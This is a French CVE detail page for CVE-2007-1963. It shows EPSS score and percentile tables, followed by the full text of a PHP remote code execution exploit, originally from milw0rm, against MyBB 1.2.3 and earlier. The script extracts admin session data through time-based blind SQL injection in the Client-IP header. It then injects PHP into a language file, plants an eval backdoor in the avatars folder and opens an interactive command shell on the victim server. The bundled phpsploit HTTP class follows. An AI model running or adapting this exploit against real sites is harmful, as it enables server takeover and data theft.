CVE-2007-1963 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	1.14%	–	–
2022-03-13	–	–	1.14%	–	–
2022-04-03	–	–	1.14%	–	–
2022-06-26	–	–	1.14%	–	–
2022-09-25	–	–	1.14%	–	–
2023-02-26	–	–	1.14%	–	–
2023-03-12	–	–	–	28.8%	–
2023-04-23	–	–	–	22.55%	–
2023-05-28	–	–	–	27.94%	–
2023-07-02	–	–	–	22.55%	–
2023-08-06	–	–	–	28.8%	–
2023-09-17	–	–	–	32.7%	–
2023-10-15	–	–	–	32.7%	–
2023-12-03	–	–	–	25.95%	–
2024-01-07	–	–	–	11.25%	–
2024-02-18	–	–	–	9.93%	–
2024-06-02	–	–	–	8.33%	–
2024-06-09	–	–	–	6.36%	–
2024-12-22	–	–	–	0.95%	–
2025-01-19	–	–	–	0.95%	–
2025-03-18	–	–	–	–	0.89%
2025-03-30	–	–	–	–	0.89%
2025-04-06	–	–	–	–	0.89%
2025-04-06	–	–	–	–	0.89,%

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Date	Percentile
2022-02-06	35%
2022-03-13	36%
2022-04-03	57%
2022-06-26	58%
2022-09-25	59%
2023-02-26	6%
2023-03-12	96%
2023-04-23	96%
2023-05-28	96%
2023-07-02	96%
2023-08-06	96%
2023-09-17	96%
2023-10-15	97%
2023-12-03	96%
2024-01-07	95%
2024-02-18	95%
2024-06-02	94%
2024-06-09	94%
2024-12-22	83%
2025-01-19	83%
2025-03-18	74%
2025-03-30	73%
2025-04-06	74%
2025-04-06	74%

#!/usr/bin/php <?php error_reporting(E_ALL ^ E_NOTICE); # http://www.milw0rm.com/exploits/2012 # They corrected (not all) a lot of SQL requests which use the ipaddress, with $db->escape_string. # They don't corrected the function (this is a choice ... the bad) and they forgot to correct 1 (only) SQL request. # They must correct the problem at the source =) # if($argc < 3) { print(" --- MyBulletinBoard (MyBB) <= 1.2.3 Remote Code Execution Exploit --- ----------------------------------------------------------------------- PHP conditions: none Credits: DarkFig <gmdarkfig@gmail.com> URL: http://www.acid-root.new.fr/ ----------------------------------------------------------------------- Usage: $argv[0] -url http://victim.com/ [Options] Params: -url For example http://victim.com/myBB/ Options: -debug Debug mod activated (debug_mybb.html) -truetime Server response time which returns true -benchmark You can change the value used in benchmark() -proxy If you wanna use a proxy <proxyhost:proxyport> -proxyauth Basic authentification <proxyuser:proxypwd> Note: If you have some problems use -debug, -benchmark, -truetime ----------------------------------------------------------------------- ");exit(1); } $url = getparam('url',1); $debug = (getparam('debug')!='') ? 1 : 0; $benchmark = (getparam('benchmark')!='') ? getparam('benchmark') : '1000000'; $proxy = getparam($proxy); $proxyauth = getparam($proxyauth); $backdoor = 'uploads/avatars/backdoor.php'; # inc/cache/backdoor.php $filetoed = 'index.lang.php'; $xpl = new phpsploit(); $xpl->agent('Firefox'); if($proxy) $xpl->proxy($proxy); if($proxyauth) $xpl->proxyauth($proxyauth); if($debug) debug(1); # There is two solutions to be logged in as administrator. # # SOLUTION NUMBER 1 # mysql> select * from mybb_users\G # *************************** 1. row *************************** # uid: 1 # username: root # password: 39ac8681f5cf4fcd9c9c09719a618bd3 # salt: BFeJBOCF # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA... # # $xpl->post($url.'admin/index.php','username=root&password=toor&do=login&goto='); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # SOLUTION NUMBER 2 # mysql> select * from mybb_adminsessions\G # *************************** 1. row *************************** # sid: 81e267263b9254f3aaf670383bfbfec9 # uid: 1 # loginkey: VYLJia9InmLgM1PT6v2whyMbaoSuprngLnkW55j3zlywItyZBA # ip: 127.0.0.1 # dateline: 1175443967 # lastactive: 1175444369 # # $xpl->addheader('Client-IP','127.0.0.1'); # $xpl->get($url.'admin/index.php?adminsid=81e267263b9254f3aaf670383bfbfec9'); # print $xpl->getcontent(); // ...Welcome to the MyBB Administration Control Panel... # # I decided to use the solution number 2. # We can also add an administrator (easily) ... but it's not interesting. # print "\nAdmin IP : "; $ip = sql_inject('ip'); print "\nAdmin sid: "; $sid = sql_inject('sid'); print "\nTrying to be logged in as administrator"; $xpl->addheader('Client-IP',$ip); $xpl->get($url."admin/languages.php?adminsid=$sid"); # Trying to find the language if(preg_match('#<input type="hidden" name="lang" value="(\S*)"#',$xpl->getcontent(),$langmatches)) $lang=$langmatches[1]; else $lang='english'; print "\nLanguage: $lang"; # Language configuration $xpl->get($url."admin/languages.php?adminsid=$sid&action=edit&lang=$lang&editwith=0&file=$filetoed"); preg_match_all('#name="(.*)">(.*)&lt;/textarea&gt;#',$xpl->getcontent(),$name_value); # We can't use: # - <? OR <?php # - <script language="php"> # - ' OR " # $PHPCODE = '${${error_reporting(0)}}' .'${${$handle=fopen('.chrit('./'.$backdoor).','.chrit('w').')}}' .'${${fwrite($handle,'.chrit('<?php error_reporting(0);eval($_SERVER[HTTP_SHELL]);exit(0); ?>').')}}' .'${${fclose($handle)}}'; $name_value[2][0] .= $PHPCODE; $postdata=array(frmdt_url => $url.'admin/languages.php', "adminsid" => $sid, "action" => "do_edit", "lang" => $lang, "editwith" => 0, "inadmin"=> 0, "file"=> $filetoed, "Update Language Variables"=>" Update Language Variables"); for($i=0;$i<count($name_value[1]);$i++) $postdata[html_entity_decode($name_value[1][$i])] = html_entity_decode($name_value[2][$i]); # print $xpl->showlastrequest(); $xpl->formdata($postdata); # Trying to execute the php code $xpl->get($url.'index.php'); # If not the default language $xpl->get($url.'inc/languages/'.$lang.'/'.$filetoed); print "\nThe php file should be created\n\$shell> "; # Hello master while(!preg_match("#^(quit|exit)$#",($cmd = trim(fgets(STDIN))))) { # ');include('../../inc/config.php');print $config['password'];// $xpl->addheader('Shell',"system('$cmd');"); $xpl->get($url.$backdoor); print $xpl->getcontent()."\n\$shell> "; } function sql_inject($field) { global $xpl,$url,$prefix,$debug,$result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip $sub=0;$string=''; if($field=='ip') {$a='44';$b='57';} # . 0-9 else {$a='46';$b='70';} # 0-9 A-Z while(TRUE) { $sub++; for($i=$a;$i<=$b;$i++) { # Random ip $fakeip = rand(128,254).'.' .rand(128,254).'.' .rand(128,254).'.' .rand(128,254); # Calculation of the server response time which returns TRUE if($i==$a) $f='TST'; # End of the string ? elseif($i==($a+1)) $f='NULL'; # Test the char else $f=$i; # Table prefix if($sub==1 AND $i==$a) { $xpl->addheader('Client-IP',$fakeip."'<script>alert(666)</script>"); $xpl->get($url.'index.php'); if(preg_match("#DELETE FROM (\S*)sessions#i",$xpl->getcontent(),$match)) $prefix=$match[1]; else $prefix='mybb_'; } # +-class_session.php (#2) # | # 475. function create_session($uid=0) # 476. { # 477. global $db; # 478. $speciallocs = $this->get_special_locations(); # 479. # 480. // If there is a proper uid, delete by uid. # 481. if($uid > 0) # 482. { # 483. $db->delete_query(TABLE_PREFIX."sessions", "uid=".$uid); # 484. $onlinedata['uid'] = $uid; # 485. } # 486. // Else delete by ip. # 487. else # 488. { // $this->ipaddress = get_ip(); # 489. $db->delete_query(TABLE_PREFIX."sessions", "ip='".$this->ipaddress."'"); # 490. $onlinedata['uid'] = 0; # 491. } # $sql = $fakeip."' OR ip=(SELECT IF(SUBSTR("; $sql .= ($f=='TST') ? "(SELECT 1)" : "(SELECT $field FROM ${prefix}adminsessions ORDER BY lastactive DESC LIMIT 1)"; $sql .= ($f=='TST') ? ",1" : ",$sub"; $sql .= ($f=='TST') ? ",1)=CHAR(49)" : ",1)=CHAR($f)"; $sql .= ",BENCHMARK($benchmark,CHAR(66)),1)) #"; # +-functions.php (#1) # | # 1836. function get_ip() # 1837. { # 1838. if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])) # 1839. { # 1840. if(preg_match_all("#[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}#s", $_SERVER['HTTP_X_FORWARDED_FOR'], $addresses)) # 1841. { # 1842. foreach($addresses[0] as $key => $val) # 1843. { # 1844. if(!preg_match("#^(10|172\.16|192\.168)\.#", $val)) # 1845. { # 1846. $ip = $val; # 1847. break; # 1848. } # 1849. } # 1850. } # 1851. } # 1852. if(!isset($ip)) # 1853. { # 1854. if(isset($_SERVER['HTTP_CLIENT_IP'])) # 1855. { # 1856. $ip = $_SERVER['HTTP_CLIENT_IP']; # 1857. } # 1858. else # 1859. { # 1860. $ip = $_SERVER['REMOTE_ADDR']; # 1861. } # 1862. } # 1863. return $ip; # 1864. } # $bef = time(); $xpl->reset('header'); $xpl->addheader('Client-IP',$sql); $xpl->get($url.'index.php'); $aft = time(); if($f=='TST') $truetime=$aft-$bef; if(getparam('truetime')!='') $truetime=getparam('truetime'); # Server response time >= Server response time which returns TRUE ? $restime = $aft-$bef; if($restime >= $truetime AND $f != 'TST') $result='TRUE'; else $result='FALSE'; # Debug mode activated if($debug) debug('',$field); # The tested char returns TRUE if($result=='TRUE') { if($f!='NULL') { # Continue print strtolower(chr($f)); $string .= chr($f); break; } else { # End of the string $xpl->reset('header'); return $string; } } # Retry if no char found if($f==$b) $sub--; } } } function debug($init='',$dafield='') { global $result,$bef,$aft,$truetime,$benchmark,$a,$b,$sub,$f; #,$fakeip if($init) { $handle = fopen("debug_mybb.html","w+"); $data = "<h1><div align='center'>MyBulletinBoard (MyBB) &lt;= 1.2.3 Code Execution Exploit</div></h1> <pre><table width='0' border='1' align='center' cellspacing='0'><tr> <td align='center'><b>REQUEST TIME</b></td> <td align='center'><b>RESPONSE TIME</b></td> <td align='center'><b>TRUETIME</b></td> <td align='center'><b>BENCHMARK</b></td> <td align='center'><b>RESULT</b></td>"; # <td align='center'><b>IP</b></td> $data .= "<td align='center'><b>FIELD</b></td> <td align='center'><b>CHARSET</b></td> <td align='center'><b>SUBSTR()</b></td> <td align='center'><b>ORD()</b></td> <td align='center'><b>CHAR()</b></td>"; fwrite($handle,$data); fclose($handle); } else { $handle = fopen("debug_mybb.html","a"); $data = "<tr".(($result=='TRUE') ? " bgcolor='#FFFF00'" : "")."> <td align='center'>&nbsp;".htmlentities($bef)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($aft)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($truetime)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($benchmark)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($result)."&nbsp;</td>"; # <td align='center'>&nbsp;".htmlentities($fakeip)."&nbsp;</td> $data .= "<td align='center'>&nbsp;".htmlentities($dafield)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities("$a-$b")."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($sub)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities($f)."&nbsp;</td> <td align='center'>&nbsp;".htmlentities(chr($f))."&nbsp;</td></tr>"; fwrite($handle,$data); fclose($handle); } } function chrit($string) { $char = ''; for($i=0;$i<strlen($string);$i++) { $char .= 'chr('.ord($string[$i]).')'; $char .= ($i != (strlen($string)-1)) ? '.' : ''; } return $char; } function getparam($param,$opt='') { global $argv; foreach($argv as $value => $key) { if($key == '-'.$param) { if(!empty($argv[$value+1])) return $argv[$value+1]; else return 1; } } if($opt) exit("\n-$param parameter required"); else return; } /* * * Copyright (C) darkfig * * This program is free software; you can redistribute it and/or * modify it under the terms of the GNU General Public License * as published by the Free Software Foundation; either version 2 * of the License, or (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. * * TITLE: PhpSploit Class * REQUIREMENTS: PHP 5 (remove "private", "public" if you have PHP 4) * VERSION: 1.2 * LICENSE: GNU General Public License * ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt * FILENAME: phpsploitclass.php * * CONTACT: gmdarkfig@gmail.com (french / english) * GREETZ: Sparah, Ddx39 * * DESCRIPTION: * The phpsploit is a class implementing a web user agent. * You can add cookies, headers, use a proxy server with (or without) a * basic authentification. It supports the GET and the POST method. It can * also be used like a browser with the cookiejar() function (which allow * a server to add several cookies for the next requests) and the * allowredirection() function (which allow the script to follow all * redirections sent by the server). It can return the content (or the * headers) of the request. Others useful functions can be used for debugging. * A manual is actually in development but to know how to use it, you can * read the comments. * * CHANGELOG: * [2007-01-24] (1.2) * * Bug #2 fixed: Problem concerning the getcookie() function ((|;)) * * New: multipart/form-data enctype is now supported * * [2006-12-31] (1.1) * * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug) * * New: You can now call the getheader() / getcontent() function without parameters * * [2006-12-30] (1.0) * * First version * */ class phpsploit { /** * This function is called by the get()/post() functions. * You don't have to call it, this is the main function. * * @return $server_response */ private function sock() { if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport); else $socket = fsockopen($this->host,$this->port); if(!$socket) die("Error: The host doesn't exist"); if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n"; elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n"; else die("Error: Invalid method"); if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n"; $this->packet .= "Host: ".$this->host."\r\n"; if(!empty($this->agent)) $this->packet .= "User-Agent: ".$this->agent."\r\n"; if(!empty($this->header)) $this->packet .= $this->header."\r\n"; if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n"; $this->packet .= "Connection: Close\r\n"; if($this->method==="post") { $this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data."\r\n"; } elseif($this->method==="formdata") { $this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n"; $this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n"; $this->packet .= $this->data; } $this->packet .= "\r\n"; $this->recv = ''; fputs($socket,$this->packet); while(!feof($socket)) $this->recv .= fgets($socket); fclose($socket); if($this->cookiejar) $this->cookiejar($this->getheader($this->recv)); if($this->allowredirection) return $this->allowredirection($this->recv); else return $this->recv; } /** * This function allows you to add several cookie in the * request. Several methods are supported: * * $this->addcookie("name","value"); * or * $this->addcookie("name=newvalue"); * or * $this->addcookie("othername=overvalue; xx=zz; y=u"); * * @param string $cookiename * @param string $cookievalue * */ public function addcookie($cookn,$cookv='') { // $this->addcookie("name","value"); work avec replace if(!empty($cookv)) { if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete if(!empty($this->cookie)) { if(preg_match("/$cookn=/",$this->cookie)) { $this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie); } else { $this->cookie .= " ".$cookn."=".$cookv.";"; // " ". } } else { $this->cookie = $cookn."=".$cookv.";"; } } // $this->addcookie("name=value; othername=othervalue"); else { if(!empty($this->cookie)) { $cookn = preg_replace("/(.*);$/","$1",$cookn); $cookarr = explode(";",str_replace(" ", "",$cookn)); for($i=0;$i<count($cookarr);$i++) { preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches); $cookn = $matches[1]; $cookv = $matches[2]; $this->addcookie($cookn,$cookv); } } else { $cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";"; $this->cookie = $cookn; } } } /** * This function allows you to add several headers in the * request. Several methods are supported: * * $this->addheader("headername","headervalue"); * or * $this->addheader("headername: headervalue"); * * @param string $headername * @param string $headervalue */ public function addheader($headern,$headervalue='') { // $this->addheader("name","value"); if(!empty($headervalue)) { if(!empty($this->header)) { if(preg_match("/$headern:/",$this->header)) { $this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header); } else { $this->header .= "\r\n".$headern.": ".$headervalue; } } else { $this->header=$headern.": ".$headervalue; } } // $this->addheader("name: value"); else { if(!empty($this->header)) { $headarr = explode(": ",$headern); $headern = $headarr[0]; $headerv = $headarr[1]; $this->addheader($headern,$headerv); } else { $this->header=$headern; } } } /** * This function allows you to use an http proxy server. * Several methods are supported: * * $this->proxy("proxyip","8118"); * or * $this->proxy("proxyip:8118") * * @param string $proxyhost * @param integer $proxyport */ public function proxy($proxy,$proxyp='') { // $this->proxy("localhost:8118"); if(empty($proxyp)) { preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr); $proxh = $proxarr[1]; $proxp = $proxarr[2]; $this->proxyhost=$proxh; $this->proxyport=$proxp; } // $this->proxy("localhost",8118); else { $this->proxyhost=$proxy; $this->proxyport=intval($proxyp); } if($this->proxyport > 65535) die("Error: Invalid port number"); } /** * This function allows you to use an http proxy server * which requires a basic authentification. Several * methods are supported: * * $this->proxyauth("darkfig","dapasswd"); * or * $this->proxyauth("darkfig:dapasswd"); * * @param string $proxyuser * @param string $proxypass */ public function proxyauth($proxyauth,$proxypasse='') { // $this->proxyauth("darkfig:password"); if(empty($proxypasse)) { preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr); $proxu = $proxautharr[1]; $proxp = $proxautharr[2]; $this->proxyuser=$proxu; $this->proxypass=$proxp; } // $this->proxyauth("darkfig","password"); else { $this->proxyuser=$proxyauth; $this->proxypass=$proxypasse; } } /** * This function allows you to set the "User-Agent" header. * Several methods are possible to do that: * * $this->agent("Mozilla Firefox"); * or * $this->addheader("User-Agent: Mozilla Firefox"); * or * $this->addheader("User-Agent","Mozilla Firefox"); * * @param string $useragent */ public function agent($useragent) { $this->agent=$useragent; } /** * This function returns the header which will be * in the next request. * * $this->showheader(); * * @return $header */ public function showheader() { return $this->header; } /** * This function returns the cookie which will be * in the next request. * * $this->showcookie(); * * @return $storedcookies */ public function showcookie() { return $this->cookie; } /** * This function returns the last formed * http request (the http packet). * * $this->showlastrequest(); * * @return $last_http_request */ public function showlastrequest() { return $this->packet; } /** * This function sends the formed http packet with the * GET method. You can precise the port of the host. * * $this->get("http://localhost"); * $this->get("http://localhost:888/xd/tst.php"); * * @param string $urlwithpath * @return $server_response */ public function get($url) { $this->target($url); $this->method="get"; return $this->sock(); } /** * This function sends the formed http packet with the * POST method. You can precise the port of the host. * * $this->post("http://localhost/index.php","admin=1&user=dark"); * * @param string $urlwithpath * @param string $postdata * @return $server_response */ public function post($url,$data) { $this->target($url); $this->method="post"; $this->data=$data; return $this->sock(); } /** * This function sends the formed http packet with the * POST method using the multipart/form-data enctype. * * $array = array( * frmdt_url => "http://localhost/upload.php", * frmdt_boundary => "123456", # Optional * "email" => "me@u.com", * "varname" => array( * frmdt_type => "image/gif", # Optional * frmdt_transfert => "binary", # Optional * frmdt_filename => "hello.php", * frmdt_content => "<?php echo ':)'; ?>")); * $this->formdata($array); * * @param array $array * @return $server_response */ public function formdata($array) { $this->target($array[frmdt_url]); $this->method="formdata"; $this->data=''; if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit"; else $this->boundary=$array[frmdt_boundary]; foreach($array as $key => $value) { if(!preg_match("#^frmdt_(boundary|url)#",$key)) { $this->data .= "-----------------------------".$this->boundary."\r\n"; $this->data .= "Content-Disposition: form-data; name=\"".$key."\";"; if(!is_array($value)) { $this->data .= "\r\n\r\n".$value."\r\n"; } else { $this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n"; if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n"; if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n"; $this->data .= "\r\n".$array[$key][frmdt_content]."\r\n"; } } } $this->data .= "-----------------------------".$this->boundary."--\r\n"; return $this->sock(); } /** * This function returns the content of the server response * without the headers. * * $this->getcontent($this->get("http://localhost/")); * or * $this->getcontent(); * * @param string $server_response * @return $onlythecontent */ public function getcontent($code='') { if(empty($code)) $code = $this->recv; $content = explode("\n",$code); $onlycode = ''; for($i=1;$i<count($content);$i++) { if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1; if($ok) $onlycode .= $content[$i]."\n"; } return $onlycode; } /** * This function returns the headers of the server response * without the content. * * $this->getheader($this->post("http://localhost/x.php","x=1&z=2")); * or * $this->getheader(); * * @param string $server_response * @return $onlytheheaders */ public function getheader($code='') { if(empty($code)) $code = $this->recv; $header = explode("\n",$code); $onlyheader = $header[0]."\n"; for($i=1;$i<count($header);$i++) { if(!preg_match("/^(\S*):/",$header[$i])) break; $onlyheader .= $header[$i]."\n"; } return $onlyheader; } /** * This function is called by the cookiejar() function. * It adds the value of the "Set-Cookie" header in the "Cookie" * header for the next request. You don't have to call it. * * @param string $server_response */ private function getcookie($code) { $carr = explode("\n",str_replace("\r\n","\n",$code)); for($z=0;$z<count($carr);$z++) { if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr)) { $cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1])); } } for($i=0;$i<count($cookie);$i++) { preg_match("/(\S*)=(\S*)(|;)/",$cookie[$i],$matches); $cookn = $matches[1]; $cookv = $matches[2]; $this->addcookie($cookn,$cookv); } } /** * This function is called by the get()/post() functions. * You don't have to call it. * * @param string $urltarg */ private function target($urltarg) { if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/"; $this->url=$urltarg; $array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg))); $this->host=$array[0]; preg_match("/:(\d+)\//",$urltarg,$matches); $this->port=empty($matches[1]) ? 80 : $matches[1]; $temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)); preg_match("/\/(.*)\//",$temp,$matches); $this->path=str_replace("//","/","/".$matches[1]."/"); if($this->port > 65535) die("Error: Invalid port number"); } /** * If you call this function, the script will * extract all "Set-Cookie" headers values * and it will automatically add them into the "Cookie" header * for all next requests. * * $this->cookiejar(1); // enabled * $this->cookiejar(0); // disabled * */ public function cookiejar($code) { if($code===0) $this->cookiejar=''; if($code===1) $this->cookiejar=1; else { $this->getcookie($code); } } /** * If you call this function, the script will * follow all redirections sent by the server. * * $this->allowredirection(1); // enabled * $this->allowredirection(0); // disabled * * @return $this->get($locationresponse) */ public function allowredirection($code) { if($code===0) $this->allowredirection=''; if($code===1) $this->allowredirection=1; else { if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr)) { $location = str_replace(chr(13),'',$codearr[2]); if(!eregi("://",$location)) { return $this->get("http://".$this->host.$this->path.$location); } else { return $this->get($location); } } else { return $code; } } } /** * This function allows you to reset some parameters: * * $this->reset(header); // headers cleaned * $this->reset(cookie); // cookies cleaned * $this->reset(); // clean all parameters * * @param string $func */ public function reset($func='') { switch($func) { case "header": $this->header=''; break; case "cookie": $this->cookie=''; break; default: $this->cookiejar=''; $this->header=''; $this->cookie=''; $this->allowredirection=''; $this->agent=''; break; } } } ?> # milw0rm.com [2007-04-03]